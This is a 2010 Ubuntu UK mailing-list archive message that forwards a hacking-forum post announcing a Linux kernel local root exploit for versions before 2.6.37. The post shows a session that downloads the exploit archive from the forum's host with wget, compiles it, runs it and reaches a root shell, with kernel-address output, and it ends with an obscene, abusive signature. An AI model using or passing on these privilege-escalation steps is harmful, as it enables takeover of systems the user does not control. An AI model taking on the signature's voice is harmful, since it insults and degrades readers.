[ubuntu-uk] Fwd: -=[ Th3-0uTl4wS | New local root exploit ]=-

Jacob Mansfield cyberjacob at gmail.com
Thu Dec 9 10:28:25 GMT 2010


thaught you guys might find this usefull, the forum post is below
Jacob Mansfield
Programmer


---------- Forwarded message ----------
From: noreply at th3-0utl4ws.com <noreply at th3-0utl4ws.com>
Date: 7 December 2010 23:28
Subject: -=[ Th3-0uTl4wS | New local root exploit ]=-
To: cyberjacob at gmail.com


Hi 0uTl4w CyberKing,

==========================================================================
http://board.th3-0utl4ws.com => A good place to learn & to give knowledge.
==========================================================================

A new security flaw has been discovered on Linux.
The exploit allows a single user to become root on a
machine. The vulnerability affects Linux distributions based on
versions lower than 2.6.37 kernel. ...

Read more:
http://board.th3-0utl4ws.com/showthread.php?p=14049

http://www.progenic.com/vote/?id=0uTl4wS  => Don't forget to vote CyberKing
;)

Regards,
Meister



FORUM POST:

  [image: Meister's Avatar] <http://board.th3-0utl4ws.com/member.php?u=26>
*Meister* <http://board.th3-0utl4ws.com/member.php?u=26> [image: Meister is
offline]
You will call me king .

Join Date: Oct 2008
Location: in the motherboard of my computer
Age: 21
Posts: 2,024
Thanks: 349
Thanked 438 Times in 283 Posts
Rep Power: 1000
[image: Meister has a reputation beyond repute][image: Meister has a
reputation beyond repute][image: Meister has a reputation beyond repute][image:
Meister has a reputation beyond repute][image: Meister has a reputation
beyond repute][image: Meister has a reputation beyond repute][image: Meister
has a reputation beyond repute][image: Meister has a reputation beyond
repute][image: Meister has a reputation beyond repute][image: Meister has a
reputation beyond repute][image: Meister has a reputation beyond repute]
[image: Send a message via Skype™ to
Meister]<http://board.th3-0utl4ws.com/showthread.php?p=14049#>
[image: Cool] *2.6.37 local root exploit*
------------------------------
A new security flaw has been discovered in the Linux kernel. The exploit
allows a single user to become root on a machine. The vulnerability affects
Linux distributions based on versions lower than 2.6.37 kernel.

The only way to counter this attack is to update your system.


Here is an example of using the exploit:
 Code: (Click here to copy code to
clipboard)<http://board.th3-0utl4ws.com/showthread.php?p=14049#>

$ wget http://th3-0utl4ws.com/xpl/nelson.zip
$ unzip nelson.zip
$ gcc -o xpl xpl.c
$ ./xpl
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf80f02a0
[+] Resolved econet_ops to 0xf80f03a0
[+] Resolved commit_creds to 0xc016c830
[+] Resolved prepare_kernel_cred to 0xc016cc80
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# uname -a
Linux *.*.* 2.6.37grs-bipiv-ipv4 #1 SMP Tue Sep 28 17:34:40 CET 2010
i686 GNU/Linux
# id
uid=0(root) gid=0(root) groupes=0(root)


????: Th3 0uTl4wS r3Fug3 http://board.th3-0utl4ws.com/showthread.php?t=9002
The exploit was tested on Ubuntu 10.10 and Centos 5

Thanks to Sebastien
__________________

*Eat a dick and choke to death on it.
-Remember kids , you only report links if you enjoy being gang banged by
Meister or being fisted by your grandparents!-
-Unless ive given you a reason to think otherwise , i hate you and your
incompetence. Dont ask me anything. EAT IT!-*

*DaRkNeSs Is My Life! Devil Is My Friend! Hating is My Business! H4ck!ng Is
My Heart! Fucking Girls Is My Hobby! Death Is My Wish!!*

[image: Reply With
Quote]<http://board.th3-0utl4ws.com/newreply.php?do=newreply&p=14049>
[image:
Multi-Quote This
Message]<http://board.th3-0utl4ws.com/newreply.php?do=newreply&p=14049>
[image:
Quick reply to this
message]<http://board.th3-0utl4ws.com/newreply.php?do=newreply&p=14049>
[image:
Thanks]<http://board.th3-0utl4ws.com/post_thanks.php?do=post_thanks_add&p=14049&securitytoken=1291890415-2615a90b69e7f42d33f4101b3bf5db96b4936c3a>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.ubuntu.com/archives/ubuntu-uk/attachments/20101209/ab34809f/attachment.htm 


More information about the ubuntu-uk mailing list